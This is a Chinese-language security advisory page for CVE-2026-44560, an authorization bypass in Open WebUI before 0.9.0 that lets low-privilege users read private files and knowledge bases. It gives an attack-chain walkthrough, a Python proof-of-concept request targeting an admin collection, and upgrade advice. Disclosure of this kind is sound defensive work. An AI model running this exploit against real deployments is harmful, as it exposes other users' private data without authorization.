IPBUF安全漏洞报告
English
CVE-2026-44560 CVSS 6.5 中危

CVE-2026-44560 Open WebUI越权读取漏洞

披露日期: 2026-05-15

漏洞信息

漏洞编号
CVE-2026-44560
漏洞类型
越权访问
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open WebUI

相关标签

越权访问Open WebUI信息泄露IDOR未授权访问

漏洞概述

Open WebUI是一个自托管的人工智能平台。在0.9.0版本之前,系统在`get_sources_from_items`函数处理特定向量存储查询时,缺乏必要的授权检查。这导致低权限用户可以利用该漏洞,绕过权限限制,非法读取他们本无权访问的文件内容和知识库数据。该漏洞已在0.9.0版本中被修复。

技术细节

该漏洞的核心在于Open WebUI后端对特定API端点的访问控制失效。在受影响版本中,当`get_sources_from_items`函数接收到特定参数组合(如type="file"且非全上下文模式、type="text"附带collection_name、或直接指定collection_name路径)时,会直接向向量数据库发起查询。由于代码逻辑中缺失了对请求者是否拥有目标资源访问权限的校验步骤,攻击者只需拥有普通低权限账号,即可通过构造特定的API请求,检索并获取向量库中存储的任意私有文件或知识库条目,造成严重的信息泄露。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标系统正在运行Open WebUI,且版本低于0.9.0。
STEP 2
2. 获取低权账号
攻击者注册或获取一个普通低权限用户账号(因为CVSS向量要求PR:L)。
STEP 3
3. 构造恶意请求
攻击者利用`get_sources_from_items`接口,构造包含目标`collection_name`或特定`type`参数的请求。
STEP 4
4. 执行越权查询
系统因缺乏授权检查,直接返回了向量数据库中对应私有文件或知识库的内容。
STEP 5
5. 数据窃取
攻击者解析响应数据,获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-44560: Open WebUI Authorization Bypass # This script demonstrates how an unauthorized user might access a specific collection. import requests import json target_url = "http://target-open-webui-instance/api/v1/sources" headers = { "Authorization": "Bearer <LOW_PRIVILEGE_TOKEN>", "Content-Type": "application/json" } # Malicious payload targeting a specific collection the user should not access payload = { "type": "text", "collection_name": "admin-private-knowledge-base", # Target collection "query": "secret" } try: response = requests.post(target_url, headers=headers, data=json.dumps(payload)) if response.status_code == 200: print("[+] Exploit successful! Data retrieved:") print(response.json()) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

Open WebUI < 0.9.0

防御指南

临时缓解措施
建议立即升级到Open WebUI 0.9.0或更高版本以修复此漏洞。如果无法立即升级,应严格限制对Open WebUI服务的网络访问,仅允许可信的内网IP访问,并密切监控日志中是否存在异常的向量存储查询请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表